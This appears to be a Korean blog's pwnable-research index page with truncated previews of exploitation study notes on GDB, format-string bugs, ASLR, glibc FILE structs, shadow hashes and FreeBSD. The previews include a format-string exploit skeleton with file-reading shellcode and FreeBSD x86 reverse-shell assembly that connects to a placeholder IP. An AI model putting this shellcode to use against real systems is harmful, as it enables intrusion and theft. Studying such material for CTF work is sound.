본문 바로가기

Research/Pwnable

NR advanced exploit lecture 보호되어 있는 글입니다. 더보기
Finding environment variable on GDB GDB 에서 환경변수 찾기 일반 gdb 1 : info variable environ --> x/dwx 2 : x/s *((char**)environ), x/s *((char**)environ+1) PEDA1 ) searchmem SHELL 더보기
Format String Bug python frame fsb 익스플로잇 기본틀 aa #/usr/bin/python from socket import * from struct import * # 쉘코드 및 NopSled 지정 nopsled = "\x90" sc = "" #sc += nopsled*0x10 sc += "\x55\x89\xe5\x83\xec\x20\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x05\x6a\x79\x66\x68\x6b\x65\x89\xe3\xcd\x80\x89\xc3\xb0\x03\x8d\x4d\xe0\xb2\x21\xcd\x80\x89\xc2\xb0\x04\xb3\x04\xcd\x80\xc9\xc3" s = socket(AF_INET, SOCK_STREAM) s.connect(("localhost", 6665.. 더보기
보호기법 정리중 http://docs.oracle.com/cd/E37670_01/E36387/html/ol_kernel_sec.html ASLR /proc/sys/kernel/randomize_va_space0 : off1 : Stack, Virtual Dynamic Shared Object, Shared Mem (스택 라이브러리)2 : Stack, Virtual Dynamic Shared Object, Shared memory, Data segment. (스택 라이브러리 힙) /etc/sysctl.conf 에서kernel.randomize_va_space = VALUE와 같이 설정하고 sysctl -p 로 실행하면 영구적 적용. ASLR 을 프로그램에 맞추어 끄고 싶다면setarch 'uname -m'` -R prog.. 더보기
linux FILE struct FILE _IO_read_ptr, fp->_IO_read_end, fp->_IO_read_base,fp->_IO_write_base,fp->_IO_write_ptr,fp->_IO_write_end,fp->_IO_buf_base, fp->_IO_buf_end, fp->_IO_save_base,fp->_IO_backup_base, fp->_IO_save_end, fp->_fileno); 더보기
SHA 512, /etc/shadow decrypt $6$NOTES topGlibc notes The glibc2 version of this function supports additional encryption algorithms. If salt is a character string starting with the characters "$id$" followed by a string terminated by "$": $id$salt$encrypted then instead of using the DES machine, id identifies the encryption method used and this then determines how the rest of the password string is interpreted. The following.. 더보기
FreeBSD 에서 proc 디렉토리에 PID 가 없을때 # mount -t procfs proc /proc # mount Open /etc/fstab - file system table, enter: # vi /etc/fstabAppend following line so that procfs get mounted automatically at boot time: proc /proc procfs rw 0 0 http://www.cyberciti.biz/faq/howto-freebsd-mount-procfs/ 더보기
[shellcode] FreeBSD x86 Reverse Read shell .globl main main: push %ebp mov %esp, %ebp sub $0x20, %esp xor %eax, %eax xor %ebx, %ebx xor %ecx, %ecx xor %edx, %edx push %ecx inc %ecx push %ecx inc %ecx push %ecx mov $0x61, %al push %eax int $0x80 mov %eax, %esi # socketaddr_in push $0xGHEFCDAB # IP LittleEndian pushw $0x3412 # port l.e pushw $0x02AA mov %esp, %ebx # connect mov $0x10, %cl push %ecx push %ebx push %eax mov $0x62, %al push %.. 더보기

티스토리툴바